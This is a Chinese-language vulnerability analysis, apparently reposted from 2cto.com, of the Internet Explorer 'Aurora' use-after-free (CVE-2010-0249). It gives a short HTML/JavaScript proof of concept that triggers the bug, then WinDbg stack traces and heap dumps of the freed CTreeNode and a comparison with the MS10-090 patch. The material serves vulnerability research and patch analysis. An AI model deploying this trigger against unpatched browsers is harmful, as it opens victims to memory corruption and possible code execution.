记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CVE-2010-0249 IE EVENTPARAM::EVENTPARAM构造错误UAF漏洞(IE AURORA)

2013-12-02 19:30
1.  Poc

<html>
<script>
var event2 = null;
function test()
{
event2 = document.createEventObject(event);
document.getElementById("x").innerHTML = "foo"; // 删除初始化了事件的元素
window.setTimeout(test2, 100);
}
function test2()
{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
</script>
<body>
<div id="x">
<input type="button" value="test" onclick="test()">
</div>
</body>
</html>

 

 
2.  基本知识点
 

CEventObj
+x04 _pparam; //EVENTPARAM *

struct EVENTPARAM
+x00 _pNode; // src element
+x04 _pNodeFrom // for move,over,out
+x08 _pNodeTo // for move,over,out
       
 
3.  元素的创建
当poc运行到该处时,会创建CEventObj对象。
event2 = document.createEventObject(event);
 
3.1  CEventObj
CEventObj对象地址为:04ce6fd0



0:008> kv
ChildEBP RetAddr Args to Child
038fc280 63629173 038fc2bc 63786814 00000000 mshtml!CEventObj::CEventObj+0x1a (FPO: [0,0,0])
038fc298 638b1cc3 038fc80c 04c7e6a8 00000000 mshtml!CEventObj::Create+0xb9
038fc2d4 638e5b00 04d74fc8 0466afd0 038fc80c mshtml!CDocument::createEventObject+0x83
038fc318 636430c9 04d74fc8 0445cfd0 0430dfd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6
038fc38c 63643595 04d74fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
038fc3b8 63643832 04d74fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25
038fc408 635e1cdc 04d74fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b
038fc450 63642f30 04d74fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1
038fc478 63642eec 04d74fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038fc4c8 633a6d37 05416fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea
038fc508 633a6c75 04440d10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8
038fc544 633a9cfe 04440d10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a
038fc604 633a9f3c 00000446 00000003 038fc804 jscript!InvokeDispatchEx+0x98
038fc638 633a77ff 04440d10 038fc66c 00000003 jscript!VAR::InvokeByName+0x135
038fc684 633a85c7 04440d10 00000003 038fc804 jscript!VAR::InvokeDispName+0x7a
038fc6b0 633a83a9 04440d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce
038fc84c 633a5ab0 038fc864 038fc9ac 038fc9ac jscript!CScriptRuntime::Run+0x28ab
038fc934 633a59f7 038fc9ac 00000000 04488f30 jscript!ScrFncObj::CallWithFrameOnStack+0xff
038fc980 633a5743 038fc9ac 00000000 04488f30 jscript!ScrFncObj::Call+0x8f
038fc9fc 633a8bc7 0448af88 038fedf8 00000000 jscript!CSession::Execute+0x175
038fcae4 633a8a35 0448af88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
038fcb68 633a6d37 0448af88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129
038fcba8 633a6c75 04440d10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8
038fcbe4 63399186 04440d10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a
038fcc74 635fe083 038fcc38 00000004 00000001 jscript!NameTbl::InvokeEx+0x372
038fccac 635fdfab 063f8fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a
038fed20 63642f30 04d78eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9
038fed48 63642eec 04d78eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038fed98 63643898 05418fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea
038fee08 636435c4 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338
038fee30 63642f30 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::subInvokeEx+0x26
038fee58 63642eec 04d7afa0 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038feea8 633a6d37 05f2afd8 00002712 00000001 mshtml!PlainInvokeEx+0xea
038feee8 633a6c75 04440d10 00002712 00000409 jscript!IDispatchExInvokeEx2+0xf8
038fef24 633a9cfe 04440d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
038fefe4 633a9d79 00002712 00000001 00000000 jscript!InvokeDispatchEx+0x98
038ff010 633a9c0b 04440d10 00000000 00000001 jscript!VAR::InvokeByDispID+0x154
038ff1ac 633a5ab0 038ff1c4 038ff30c 038ff30c jscript!CScriptRuntime::Run+0x2989
038ff294 633a59f7 038ff30c 00000000 04488fd0 jscript!ScrFncObj::CallWithFrameOnStack+0xff
038ff2e0 633a5743 038ff30c 00000000 04488fd0 jscript!ScrFncObj::Call+0x8f
038ff35c 633a8bc7 044aaf88 038ff5a0 00000000 jscript!CSession::Execute+0x175
038ff444 633a8a35 044aaf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
038ff4c8 635c3039 044aaf88 00000000 00000804 jscript!NameTbl::InvokeEx+0x129
038ff518 635c2f51 04381f88 044aaf88 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e0
038ff644 636294ce fffffda8 80011778 05eeafd8 mshtml!CBase::InvokeEvent+0x213
038ff7a4 635f377c 04381f88 04c7e6a8 04381f88 mshtml!CBase::FireEvent+0xe2
038ff81c 6362b142 04381f88 04e0afb0 00000000 mshtml!CElement::BubbleEventHelper+0x2e3
038ff984 636b2cc3 63649ccc 00000001 04e0afb0 mshtml!CElement::FireEvent+0x2d1
038ff9a4 636b2c77 04e0afb0 00000000 038ffa78 mshtml!CElement::Fire_onclick+0x1c
038ff9e0 6398f178 038ffaf8 04e0afb0 00000000 mshtml!CElement::DoClick+0x95
038ffa08 636b2b5a 038ffaf8 04e0afb0 00000000 mshtml!CInput::DoClick+0x3f
038ffaa4 635f1fea 038ffaf8 04c6cfb0 00000000 mshtml!CDoc::PumpMessage+0xf10
038ffc1c 636b58c4 00000202 00000000 001e002d mshtml!CDoc::OnMouseMessage+0x55d
038ffd4c 6364207a 04c7e6a8 00000202 00000000 mshtml!CDoc::OnWindowMessage+0x9d9
038ffd78 77d18734 00330350 00000202 00000000 mshtml!CServer::WndProc+0x78
038ffda4 77d18816 6364202e 00330350 00000202 USER32!InternalCallWinProc+0x28
038ffe0c 77d189cd 00000000 6364202e 00330350 USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])
038ffe6c 77d18a10 038ffe94 00000000 038ffeec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])
038ffe7c 02692ec9 038ffe94 00000000 01caaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
038ffeec 026348bf 045d6808 0040128e 0309eff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])
038fffa4 5de05a60 01caaf58 7c817067 038fffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])
038fffb4 7c80b713 0309eff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])
038fffec 00000000 5de05a52 0309eff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

 
3.2  EVENTPARAM
EVENTPARAM 对象的地址:054e5f08

 
 

0:008> kv
ChildEBP RetAddr Args to Child
038fc264 635f3ba8 054e5f08 04c7e6a8 00000000 mshtml!EVENTPARAM::EVENTPARAM+0x51
038fc298 638b1cc3 038fc80c 04c7e6a8 00000000 mshtml!CEventObj::Create+0xd4
038fc2d4 638e5b00 04d74fc8 0466afd0 038fc80c mshtml!CDocument::createEventObject+0x83
038fc318 636430c9 04d74fc8 0445cfd0 0430dfd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6
038fc38c 63643595 04d74fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
038fc3b8 63643832 04d74fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25
038fc408 635e1cdc 04d74fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b
038fc450 63642f30 04d74fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1
038fc478 63642eec 04d74fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038fc4c8 633a6d37 05416fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea
038fc508 633a6c75 04440d10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8
038fc544 633a9cfe 04440d10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a
038fc604 633a9f3c 00000446 00000003 038fc804 jscript!InvokeDispatchEx+0x98
038fc638 633a77ff 04440d10 038fc66c 00000003 jscript!VAR::InvokeByName+0x135
038fc684 633a85c7 04440d10 00000003 038fc804 jscript!VAR::InvokeDispName+0x7a
038fc6b0 633a83a9 04440d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce
038fc84c 633a5ab0 038fc864 038fc9ac 038fc9ac jscript!CScriptRuntime::Run+0x28ab
038fc934 633a59f7 038fc9ac 00000000 04488f30 jscript!ScrFncObj::CallWithFrameOnStack+0xff
038fc980 633a5743 038fc9ac 00000000 04488f30 jscript!ScrFncObj::Call+0x8f
038fc9fc 633a8bc7 0448af88 038fedf8 00000000 jscript!CSession::Execute+0x175
038fcae4 633a8a35 0448af88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
038fcb68 633a6d37 0448af88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129
038fcba8 633a6c75 04440d10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8
038fcbe4 63399186 04440d10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a
038fcc74 635fe083 038fcc38 00000004 00000001 jscript!NameTbl::InvokeEx+0x372
038fccac 635fdfab 063f8fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a
038fed20 63642f30 04d78eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9
038fed48 63642eec 04d78eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038fed98 63643898 05418fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea
038fee08 636435c4 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338
038fee30 63642f30 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::subInvokeEx+0x26
038fee58 63642eec 04d7afa0 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038feea8 633a6d37 05f2afd8 00002712 00000001 mshtml!PlainInvokeEx+0xea
038feee8 633a6c75 04440d10 00002712 00000409 jscript!IDispatchExInvokeEx2+0xf8

 
设置EVENTPARAM的src element

上面语句运行前:

运行后:

 

CTreeNode
dc 04e0afb0
04e0afb0 04381f88 04324fb0 00034235 00050001 ..8..O2.5B......
04e0afc0 00000361 00000006 039cefc0 043abfc0 a.............:.
04e0afd0 04324fc0 04e0afd8 00000062 00000000 .O2.....b.......
04e0afe0 00000000 04e0afc0 04e0afc0 05692fd8 ............./i.
04e0aff0 00000032 00000000 00000000 d0d0d0d0 2...............

0:008> !heap -p -a 04e0afb0
address 04e0afb0 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
4cfd478: 4e0afb0 4c - 4e0a000 2000
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
635a8225 mshtml!CHtmRootParseCtx::BeginElement+0x00000030
635bc1e9 mshtml!CHtmTextParseCtx::BeginElement+0x0000006c
635a8420 mshtml!CHtmParse::BeginElement+0x000000b7
635a93b4 mshtml!CHtmParse::ParseBeginTag+0x000000fe
635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082
635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237
635a734c mshtml!CHtmPost::Exec+0x00000221
635ac2b8 mshtml!CHtmPost::Run+0x00000015
635ac21b mshtml!PostManExecute+0x000001fd
635ac17e mshtml!PostManResume+0x000000f8
635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
63655d60 mshtml!CDwnChan::OnMethodCall+0x00000019
6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb
6363c3c5 mshtml!GlobalWndProc+0x00000183
77d18734 USER32!InternalCallWinProc+0x00000028

0:008> dc 04381f88
04381f88 6377a8e0 00000007 00000020 04399fe8 ..wc.... .....9.
04381f98 01d36f50 04e0afb0 00000135 822822a0 Po......5...."(.
04381fa8 00000002 0566cef0 6377ab1c 0000c001 ......f...wc....
04381fb8 00000000 00000000 00000000 04df8ff4 ................
04381fc8 04adcff4 00000000 00000000 00000000 ................
04381fd8 00000000 00000000 020108e0 00000000 ................
04381fe8 00000000 00000000 0000ffff 00000000 ................
04381ff8 00000000 6377a8c4 ???????? ???????? ......wc????????
0:008> !heap -p -a 04381f88
address 04381f88 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
54e7708: 4381f88 78 - 4381000 2000
mshtml!CInput::`vftable'
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
6377a7d9 mshtml!CInput::CreateElement+0x00000015
6377a7a1 mshtml!CreateInputElement+0x00000060
635a67f5 mshtml!CreateElement+0x00000043
635a9399 mshtml!CHtmParse::ParseBeginTag+0x000000e3
635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082
635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237
635a734c mshtml!CHtmPost::Exec+0x00000221
635ac2b8 mshtml!CHtmPost::Run+0x00000015
635ac21b mshtml!PostManExecute+0x000001fd
635ac17e mshtml!PostManResume+0x000000f8
635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
63655d60 mshtml!CDwnChan::OnMethodCall+0x00000019
6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb
6363c3c5 mshtml!GlobalWndProc+0x00000183
77d18734 USER32!InternalCallWinProc+0x00000028

 
从上面可以看到:
EVENTPARAM的src element对象为CInput元素。
 
4.  元素的释放
当poc运行到下面的语句时,
document.getElementById("x").innerHTML = "foo"; // 删除初始化了事件的元素
将会释放CInput元素。
 

 
多次中断后,释放CInput的CTreeNode元素。

 
5.  重用
 
function test2()
{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
当CInput的CTreeNode已经被释放时,EVENTPARAM的src element却仍然执行被释放的CTreeNode。

0:008> dc 054e5f08
054e5f08 04e0afb0 00000000 00000000 00000000 ................
054e5f18 00000000 00000000 00000146 0000013d ........F...=...
054e5f28 0000002d 0000001e 0000001e 0000000a -...............
054e5f38 0000002d 0000001e 00000000 00000000 -...............
054e5f48 00000000 ffffffff 00000000 00000000 ................
054e5f58 00000000 00000000 00000000 00000000 ................
054e5f68 00000000 04c7e6a8 00000000 063a8f30 ............0.:.
054e5f78 00000000 00000000 ffffffff ffffffff ................

当POC中脚本test2函数被执行时,
function test2()
{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
会导致重用。
 

 

038ff4ac 637b0781 04ce6fd0 04488f78 000003e9 mshtml!CEventObj::GenericGetElement+0x91
038ff4c0 6379351c 04ce6fd0 04488f78 04466fd0 mshtml!CEventObj::get_srcElement+0x15
038ff4f0 636430c9 04ce6fd0 04466fd0 04d84fd8 mshtml!GS_IDispatchp+0x9b
038ff564 63643595 04ce6fd0 000003e9 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
038ff590 63642f30 04ce6fd0 000003e9 00000001 mshtml!CBase::InvokeEx+0x25
038ff5b8 63642eec 04ce6fd0 000003e9 00000001 mshtml!CBase::VersionedInvokeEx+0x20
038ff608 633a6d37 0430dfd8 000003e9 00000001 mshtml!PlainInvokeEx+0xea
038ff648 633a6c75 04440d10 000003e9 00000409 jscript!IDispatchExInvokeEx2+0xf8
038ff684 633a9cfe 04440d10 00000409 00000002 jscript!IDispatchExInvokeEx+0x6a
038ff744 633a9f3c 000003e9 00000002 04488f70 jscript!InvokeDispatchEx+0x98
038ff77c 633a99b7 04440d10 038ff8a4 00000002 jscript!VAR::InvokeByName+0x135
038ff914 633a5ab0 038ff92c 038ffa74 038ffa74 jscript!CScriptRuntime::Run+0x655
038ff9fc 633a59f7 038ffa74 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xff
038ffa48 633a5743 038ffa74 00000000 00000000 jscript!ScrFncObj::Call+0x8f
038ffac4 633a8bc7 0448cf88 038ffcd4 00000000 jscript!CSession::Execute+0x175
038ffbac 633a8a35 0448cf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
038ffc30 633a9153 0448cf88 00000000 00000000 jscript!NameTbl::InvokeEx+0x129
038ffc58 636867fa 0448cf88 00000000 63633600 jscript!NameTbl::Invoke+0x70
038ffcec 6368675a 04d78eb8 06380fe8 04cd8d58 mshtml!CWindow::ExecuteTimeoutScript+0x87
038ffd44 6368664a 04d78eb8 04d78ef5 038ffd78 mshtml!CWindow::FireTimeOut+0xb6
038ffd54 63686656 00002009 038ffde0 6363c317 mshtml!CStackDataAry<TIMERTHREADADVISE,12>::GetStackSize+0xb6
038ffd78 77d18734 006401dc 0000000f 00002009 mshtml!GlobalWndProc+0x183
038ffda4 77d18816 6363c317 006401dc 00000113 USER32!InternalCallWinProc+0x28
038ffe0c 77d189cd 00000000 6363c317 006401dc USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])
038ffe6c 77d18a10 038ffe94 00000000 038ffeec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])
038ffe7c 02692ec9 038ffe94 00000000 01caaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
038ffeec 026348bf 045d6808 0040128e 0309eff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])
038fffa4 5de05a60 01caaf58 7c817067 038fffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])
038fffb4 7c80b713 0309eff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])
038fffec 00000000 5de05a52 0309eff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

 
6.  补丁对比
6.1  补丁前

 
6.2  补丁后(MS10-090)
 

0:008> kv
ChildEBP RetAddr Args to Child
031da1c4 3db1a542 05adaf08 042656a8 00000000 mshtml!EVENTPARAM::EVENTPARAM+0x17c
031da1f8 3dda56c2 031da76c 042656a8 00000000 mshtml!CEventObj::Create+0xd4
031da234 3dddb4f7 04394fc8 05a5cfd0 031da76c mshtml!CDocument::createEventObject+0x83
031da278 3db6af13 04394fc8 03b60fd0 05728fd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6
031da2ec 3db6b3c2 04394fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
031da318 3db6b5b6 04394fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25
031da368 3dae0bc8 04394fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b
031da3b0 3db6a955 04394fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1
031da3d8 3db6a911 04394fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20
031da428 633a6d37 055c2fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea
031da468 633a6c75 03bcad10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8
031da4a4 633a9cfe 03bcad10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a
031da564 633a9f3c 00000446 00000003 031da764 jscript!InvokeDispatchEx+0x98
031da598 633a77ff 03bcad10 031da5cc 00000003 jscript!VAR::InvokeByName+0x135
031da5e4 633a85c7 03bcad10 00000003 031da764 jscript!VAR::InvokeDispName+0x7a
031da610 633a83a9 03bcad10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce
031da7ac 633a5ab0 031da7c4 031da90c 031da90c jscript!CScriptRuntime::Run+0x28ab
031da894 633a59f7 031da90c 00000000 03b7af30 jscript!ScrFncObj::CallWithFrameOnStack+0xff
031da8e0 633a5743 031da90c 00000000 03b7af30 jscript!ScrFncObj::Call+0x8f
031da95c 633a8bc7 03b7cf88 031dcd58 00000000 jscript!CSession::Execute+0x175
031daa44 633a8a35 03b7cf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
031daac8 633a6d37 03b7cf88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129
031dab08 633a6c75 03bcad10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8
031dab44 63399186 03bcad10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a
031dabd4 3dac7fdf 031dab98 00000004 00000001 jscript!NameTbl::InvokeEx+0x372
031dac0c 3db6b728 05606fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a
031dcc80 3db6a955 04398eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9
031dcca8 3db6a911 04398eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20
031dccf8 3db6b7c2 055c4fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea
031dcd68 3db6b1f2 0439afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338


dc ecx
0455dfb0  0580ef88 057fefb0 00034235 00050001  ........5B......
0455dfc0  00000361 00000006 056e4fc0 05a86fc0  a........On..o..
0455dfd0  057fefc0 0455dfd8 00000062 00000000  ......U.b.......
0455dfe0  00000000 0455dfc0 0455dfc0 04b88fd8  ......U...U.....
0455dff0  00000042 00000000 00000000 d0d0d0d0  B...............
在补丁后,EVENTPARAM::EVENTPARAM构造函数中,会对引用的CTreeNode的引用计数进行增加,以免出现错误。
 
增加后,引用计数:

dc 0455dfb0
0455dfb0 0580ef88 057fefb0 00034235 00050001 ........5B......
0455dfc0 00000361 00000006 056e4fc0 05a86fc0 a........On..o..
0455dfd0 057fefc0 0455dfd8 00000062 00000000 ......U.b.......
0455dfe0 00000000 0455dfc0 0455dfc0 04b88fd8 ......U...U.....
0455dff0 0000004a 00000000 00000000 d0d0d0d0 J...............

 


 
6.3  结论
在创建CEventObj时,会创建EVENTPARAM结构,如果新创建的CEventObj是从已有的CEventObj继承而来时,则这两个CEventObj事件的源相同。在新创建的EVENTPARAM结构的偏移0处的元素_pNode(CTreeNode),将复制源CEventObj该处的值。
在补丁前,上述过程没有增加CTreeNode的引用计数,在精心构造的html中,有可能导致CTreeNode已经释放,而EVENTPARAM的_pNode却仍然指向它,导致释放后重用。
补丁后,在EVENTPARAM::EVENTPARAM中,对上述情况作了处理,增加CTreeNode的引用计数,不会再导致问题

知识来源: www.2cto.com/Article/201312/261071.html

阅读:161109 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2010-0249 IE EVENTPARAM::EVENTPARAM构造错误UAF漏洞(IE AURORA)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云